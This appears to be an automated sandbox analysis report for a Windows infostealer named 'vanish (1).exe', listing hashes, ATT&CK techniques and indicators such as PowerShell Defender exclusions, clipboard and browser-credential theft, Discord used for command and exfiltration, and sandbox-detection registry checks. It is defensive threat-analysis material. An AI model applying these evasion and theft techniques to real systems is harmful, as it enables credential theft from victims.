9968a98c223ddd2825ac2c43a6a54de556880c2dbcd704bc5b14c1927e9ce0cc

Resubmissions

15-01-2025 13:20

250115-qlft7stmhy 10

15-01-2025 13:04

250115-qa75batket 10

15-01-2025 12:47

250115-p1fx3svkhp 10

Analysis

max time kernel
900s
max time network
896s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
15-01-2025 13:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

vanish (1).exe
Size

7.5MB
MD5

3a15cfe7fce7dbae2bbd7e2dfa9c8e92
SHA1

636288fb385e5a7aef9ae4c5dec176cf65f5f110
SHA256

9968a98c223ddd2825ac2c43a6a54de556880c2dbcd704bc5b14c1927e9ce0cc
SHA512

34d9b66c918f4d5356ecd4d4a4fe09cce682899f703569cecc531f6f519f6f3830e9c8b8b45e44f3efe36c6110cbe98401e5dce79150977093a445776caafe1f
SSDEEP

196608:X2gFm6wfI9jUC2gYBYv3vbWY+iITm1U6fd1Ek:vFiIH2gYBgDW/TOzbD

Score

8^/10

collection defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3296	powershell.exe
400	powershell.exe
4176	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4156	cmd.exe
2228	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4792	rar.exe

Loads dropped DLL 19 IoCs

pid	Process
2504	vanish (1).exe
2504	vanish (1).exe
2504	vanish (1).exe
2504	vanish (1).exe
2504	vanish (1).exe
2504	vanish (1).exe
2504	vanish (1).exe
2504	vanish (1).exe
2504	vanish (1).exe
2504	vanish (1).exe
2504	vanish (1).exe
2504	vanish (1).exe
2504	vanish (1).exe
2504	vanish (1).exe
2504	vanish (1).exe
2504	vanish (1).exe
2504	vanish (1).exe
3468	wuauclt.exe
3468	wuauclt.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

System Binary Proxy Execution: wuauclt 1 TTPs 1 IoCs

Abuse Wuauclt to proxy execution of malicious code.

defense_evasion

System Binary Proxy Execution

T1218

pid	Process
3468	wuauclt.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
23	discord.com
24	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
680	tasklist.exe
1328	tasklist.exe
4332	tasklist.exe
2892	tasklist.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c88-21.dat	upx
behavioral2/memory/2504-25-0x00007FF9DFDF0000-0x00007FF9E04B5000-memory.dmp	upx
behavioral2/files/0x0007000000023c7b-27.dat	upx
behavioral2/files/0x0007000000023c86-31.dat	upx
behavioral2/memory/2504-30-0x00007FF9F31A0000-0x00007FF9F31C5000-memory.dmp	upx
behavioral2/files/0x0007000000023c82-48.dat	upx
behavioral2/files/0x0007000000023c81-47.dat	upx
behavioral2/files/0x0007000000023c80-46.dat	upx
behavioral2/files/0x0007000000023c7f-45.dat	upx
behavioral2/files/0x0007000000023c7e-44.dat	upx
behavioral2/files/0x0007000000023c7d-43.dat	upx
behavioral2/files/0x0007000000023c7c-42.dat	upx
behavioral2/files/0x0007000000023c7a-41.dat	upx
behavioral2/files/0x0007000000023c8d-40.dat	upx
behavioral2/files/0x0007000000023c8c-39.dat	upx
behavioral2/files/0x0007000000023c8b-38.dat	upx
behavioral2/files/0x0007000000023c87-35.dat	upx
behavioral2/files/0x0007000000023c85-34.dat	upx
behavioral2/memory/2504-32-0x00007FF9F8B50000-0x00007FF9F8B5F000-memory.dmp	upx
behavioral2/memory/2504-54-0x00007FF9EF0D0000-0x00007FF9EF0FD000-memory.dmp	upx
behavioral2/memory/2504-56-0x00007FF9EF360000-0x00007FF9EF37A000-memory.dmp	upx
behavioral2/memory/2504-58-0x00007FF9EF0A0000-0x00007FF9EF0C4000-memory.dmp	upx
behavioral2/memory/2504-60-0x00007FF9DF870000-0x00007FF9DF9EF000-memory.dmp	upx
behavioral2/memory/2504-62-0x00007FF9F3130000-0x00007FF9F3149000-memory.dmp	upx
behavioral2/memory/2504-64-0x00007FF9EFEF0000-0x00007FF9EFEFD000-memory.dmp	upx
behavioral2/memory/2504-66-0x00007FF9EF390000-0x00007FF9EF3C3000-memory.dmp	upx
behavioral2/memory/2504-70-0x00007FF9DFDF0000-0x00007FF9E04B5000-memory.dmp	upx
behavioral2/memory/2504-74-0x00007FF9F31A0000-0x00007FF9F31C5000-memory.dmp	upx
behavioral2/memory/2504-73-0x00007FF9DEC10000-0x00007FF9DF143000-memory.dmp	upx
behavioral2/memory/2504-71-0x00007FF9EAB90000-0x00007FF9EAC5E000-memory.dmp	upx
behavioral2/memory/2504-78-0x00007FF9EF0D0000-0x00007FF9EF0FD000-memory.dmp	upx
behavioral2/memory/2504-82-0x00007FF9DEAF0000-0x00007FF9DEC0A000-memory.dmp	upx
behavioral2/memory/2504-81-0x00007FF9EF360000-0x00007FF9EF37A000-memory.dmp	upx
behavioral2/memory/2504-80-0x00007FF9EF380000-0x00007FF9EF38D000-memory.dmp	upx
behavioral2/memory/2504-76-0x00007FF9EEEA0000-0x00007FF9EEEB4000-memory.dmp	upx
behavioral2/memory/2504-84-0x00007FF9DF870000-0x00007FF9DF9EF000-memory.dmp	upx
behavioral2/memory/2504-83-0x00007FF9EF0A0000-0x00007FF9EF0C4000-memory.dmp	upx
behavioral2/memory/2504-166-0x00007FF9EF390000-0x00007FF9EF3C3000-memory.dmp	upx
behavioral2/memory/2504-167-0x00007FF9EAB90000-0x00007FF9EAC5E000-memory.dmp	upx
behavioral2/memory/2504-170-0x00007FF9DEC10000-0x00007FF9DF143000-memory.dmp	upx
behavioral2/memory/2504-186-0x00007FF9F31A0000-0x00007FF9F31C5000-memory.dmp	upx
behavioral2/memory/2504-199-0x00007FF9DEAF0000-0x00007FF9DEC0A000-memory.dmp	upx
behavioral2/memory/2504-185-0x00007FF9DFDF0000-0x00007FF9E04B5000-memory.dmp	upx
behavioral2/memory/2504-191-0x00007FF9DF870000-0x00007FF9DF9EF000-memory.dmp	upx
behavioral2/memory/2504-222-0x00007FF9DFDF0000-0x00007FF9E04B5000-memory.dmp	upx
behavioral2/memory/2504-235-0x00007FF9EF380000-0x00007FF9EF38D000-memory.dmp	upx
behavioral2/memory/2504-247-0x00007FF9EAB90000-0x00007FF9EAC5E000-memory.dmp	upx
behavioral2/memory/2504-246-0x00007FF9EF390000-0x00007FF9EF3C3000-memory.dmp	upx
behavioral2/memory/2504-245-0x00007FF9EFEF0000-0x00007FF9EFEFD000-memory.dmp	upx
behavioral2/memory/2504-244-0x00007FF9F3130000-0x00007FF9F3149000-memory.dmp	upx
behavioral2/memory/2504-243-0x00007FF9DEAF0000-0x00007FF9DEC0A000-memory.dmp	upx
behavioral2/memory/2504-242-0x00007FF9EF0A0000-0x00007FF9EF0C4000-memory.dmp	upx
behavioral2/memory/2504-241-0x00007FF9EF360000-0x00007FF9EF37A000-memory.dmp	upx
behavioral2/memory/2504-240-0x00007FF9EF0D0000-0x00007FF9EF0FD000-memory.dmp	upx
behavioral2/memory/2504-239-0x00007FF9F8B50000-0x00007FF9F8B5F000-memory.dmp	upx
behavioral2/memory/2504-238-0x00007FF9F31A0000-0x00007FF9F31C5000-memory.dmp	upx
behavioral2/memory/2504-237-0x00007FF9DEC10000-0x00007FF9DF143000-memory.dmp	upx
behavioral2/memory/2504-234-0x00007FF9EEEA0000-0x00007FF9EEEB4000-memory.dmp	upx
behavioral2/memory/2504-228-0x00007FF9DF870000-0x00007FF9DF9EF000-memory.dmp	upx

Drops file in Windows directory 20 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\Download\09015066a776ea7be7a775466cfce378\windlp.state.xml	wuauclt.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	Ngen.exe
File created	C:\Windows\SoftwareDistribution\Download\09015066a776ea7be7a775466cfce378\Metadata\UpdateAgent.dll	wuauclt.exe
File opened for modification	C:\Windows\SoftwareDistribution\Download\09015066a776ea7be7a775466cfce378\Metadata\Mitigation.dll	wuauclt.exe
File opened for modification	C:\Windows\SoftwareDistribution\Download\09015066a776ea7be7a775466cfce378\Metadata\UAOneSettings.dll	wuauclt.exe
File opened for modification	C:\Windows\SoftwareDistribution\Download\09015066a776ea7be7a775466cfce378\Metadata\wcp.dll	wuauclt.exe
File opened for modification	C:\Windows\SoftwareDistribution\Download\09015066a776ea7be7a775466cfce378\Metadata\TurboStack.dll	wuauclt.exe
File opened for modification	C:\Windows\SoftwareDistribution\Download\09015066a776ea7be7a775466cfce378\Metadata\WinREAgent.dll	wuauclt.exe
File opened for modification	C:\Windows\SoftwareDistribution\Download\09015066a776ea7be7a775466cfce378\Metadata\ReserveManager.dll	wuauclt.exe
File opened for modification	C:\Windows\SoftwareDistribution\Download\09015066a776ea7be7a775466cfce378\Metadata\78902938-e1a7-4f20-9988-af1f7b7b0cb4.AggregatedMetadata.cab	wuauclt.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenrootstorelock.dat	Ngen.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.log	Ngen.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat	Ngen.exe
File created	C:\Windows\rescache\_merged\1973483750\1905887529.pri	LogonUI.exe
File opened for modification	C:\Windows\SoftwareDistribution\Download\09015066a776ea7be7a775466cfce378\Metadata\dpx.dll	wuauclt.exe
File opened for modification	C:\Windows\SoftwareDistribution\Download\09015066a776ea7be7a775466cfce378\Metadata\DesktopTargetServicedCompDB_Neutral.xml.cab	wuauclt.exe
File opened for modification	C:\Windows\Logs\MoSetup\UpdateAgent.log	wuauclt.exe
File opened for modification	C:\Windows\SoftwareDistribution\Download\09015066a776ea7be7a775466cfce378\windlp.state-old.xml	wuauclt.exe
File created	C:\Windows\Microsoft.NET\ngenserviceclientlock.dat	Ngen.exe
File created	C:\Windows\Microsoft.NET\ngenserviceclientlock.dat	Ngen.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ngen.exe

Checks SCSI registry key(s) 3 TTPs 8 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000f59c2d6185d8bf0c0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000f59c2d610000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900f59c2d61000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1df59c2d61000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000f59c2d6100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3916	WMIC.exe
3988	WMIC.exe
732	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4852	systeminfo.exe

Modifies data under HKEY_USERS 58 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133814199926247993"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	wuauclt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	wuauclt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	wuauclt.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	wuauclt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	wuauclt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	wuauclt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	wuauclt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "64"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	wuauclt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	wuauclt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	wuauclt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID	wuauclt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{66874739-C782-4792-9610-A16156EF5BFA}	wuauclt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{66874739-C782-4792-9610-A16156EF5BFA}\AppID = "{C009D619-6D7C-4448-BDC6-4835010E4D83}"	wuauclt.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{66874739-C782-4792-9610-A16156EF5BFA}	wuauclt.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4176	powershell.exe
3296	powershell.exe
3296	powershell.exe
4176	powershell.exe
2228	powershell.exe
2228	powershell.exe
2228	powershell.exe
4956	powershell.exe
4956	powershell.exe
4956	powershell.exe
400	powershell.exe
400	powershell.exe
3860	powershell.exe
3860	powershell.exe
2112	msedge.exe
2112	msedge.exe
5916	chrome.exe
5916	chrome.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1692	taskmgr.exe

Suspicious behavior: LoadsDriver 64 IoCs

pid	Process
4864	Process not Found
1832	Process not Found
4004	Process not Found
4408	Process not Found
5108	Process not Found
2176	Process not Found
2028	Process not Found
3972	Process not Found
2296	Process not Found
5676	Process not Found
5556	Process not Found
5624	Process not Found
2476	Process not Found
2428	Process not Found
2332	Process not Found
972	Process not Found
5008	Process not Found
232	Process not Found
2452	Process not Found
2832	Process not Found
5544	Process not Found
3140	Process not Found
4708	Process not Found
448	Process not Found
5620	Process not Found
4916	Process not Found
4120	Process not Found
1088	Process not Found
2876	Process not Found
5688	Process not Found
624	Process not Found
6104	Process not Found
2240	Process not Found
5668	Process not Found
628	Process not Found
5672	Process not Found
3892	Process not Found
1696	Process not Found
1536	Process not Found
1504	Process not Found
3636	Process not Found
4400	Process not Found
2232	Process not Found
4980	Process not Found
5648	Process not Found
5796	Process not Found
1044	Process not Found
3480	Process not Found
2148	Process not Found
3568	Process not Found
3068	Process not Found
5752	Process not Found
4448	Process not Found
4348	Process not Found
3012	Process not Found
732	Process not Found
4628	Process not Found
5080	Process not Found
1568	Process not Found
4896	Process not Found
5056	Process not Found
5092	Process not Found
2984	Process not Found
2528	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4988	WMIC.exe
Token: SeSecurityPrivilege	4988	WMIC.exe
Token: SeTakeOwnershipPrivilege	4988	WMIC.exe
Token: SeLoadDriverPrivilege	4988	WMIC.exe
Token: SeSystemProfilePrivilege	4988	WMIC.exe
Token: SeSystemtimePrivilege	4988	WMIC.exe
Token: SeProfSingleProcessPrivilege	4988	WMIC.exe
Token: SeIncBasePriorityPrivilege	4988	WMIC.exe
Token: SeCreatePagefilePrivilege	4988	WMIC.exe
Token: SeBackupPrivilege	4988	WMIC.exe
Token: SeRestorePrivilege	4988	WMIC.exe
Token: SeShutdownPrivilege	4988	WMIC.exe
Token: SeDebugPrivilege	4988	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4988	WMIC.exe
Token: SeRemoteShutdownPrivilege	4988	WMIC.exe
Token: SeUndockPrivilege	4988	WMIC.exe
Token: SeManageVolumePrivilege	4988	WMIC.exe
Token: 33	4988	WMIC.exe
Token: 34	4988	WMIC.exe
Token: 35	4988	WMIC.exe
Token: 36	4988	WMIC.exe
Token: SeDebugPrivilege	4176	powershell.exe
Token: SeIncreaseQuotaPrivilege	4988	WMIC.exe
Token: SeSecurityPrivilege	4988	WMIC.exe
Token: SeTakeOwnershipPrivilege	4988	WMIC.exe
Token: SeLoadDriverPrivilege	4988	WMIC.exe
Token: SeSystemProfilePrivilege	4988	WMIC.exe
Token: SeSystemtimePrivilege	4988	WMIC.exe
Token: SeProfSingleProcessPrivilege	4988	WMIC.exe
Token: SeIncBasePriorityPrivilege	4988	WMIC.exe
Token: SeCreatePagefilePrivilege	4988	WMIC.exe
Token: SeBackupPrivilege	4988	WMIC.exe
Token: SeRestorePrivilege	4988	WMIC.exe
Token: SeShutdownPrivilege	4988	WMIC.exe
Token: SeDebugPrivilege	4988	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4988	WMIC.exe
Token: SeRemoteShutdownPrivilege	4988	WMIC.exe
Token: SeUndockPrivilege	4988	WMIC.exe
Token: SeManageVolumePrivilege	4988	WMIC.exe
Token: 33	4988	WMIC.exe
Token: 34	4988	WMIC.exe
Token: 35	4988	WMIC.exe
Token: 36	4988	WMIC.exe
Token: SeDebugPrivilege	4332	tasklist.exe
Token: SeDebugPrivilege	3296	powershell.exe
Token: SeIncreaseQuotaPrivilege	3916	WMIC.exe
Token: SeSecurityPrivilege	3916	WMIC.exe
Token: SeTakeOwnershipPrivilege	3916	WMIC.exe
Token: SeLoadDriverPrivilege	3916	WMIC.exe
Token: SeSystemProfilePrivilege	3916	WMIC.exe
Token: SeSystemtimePrivilege	3916	WMIC.exe
Token: SeProfSingleProcessPrivilege	3916	WMIC.exe
Token: SeIncBasePriorityPrivilege	3916	WMIC.exe
Token: SeCreatePagefilePrivilege	3916	WMIC.exe
Token: SeBackupPrivilege	3916	WMIC.exe
Token: SeRestorePrivilege	3916	WMIC.exe
Token: SeShutdownPrivilege	3916	WMIC.exe
Token: SeDebugPrivilege	3916	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3916	WMIC.exe
Token: SeRemoteShutdownPrivilege	3916	WMIC.exe
Token: SeUndockPrivilege	3916	WMIC.exe
Token: SeManageVolumePrivilege	3916	WMIC.exe
Token: 33	3916	WMIC.exe
Token: 34	3916	WMIC.exe

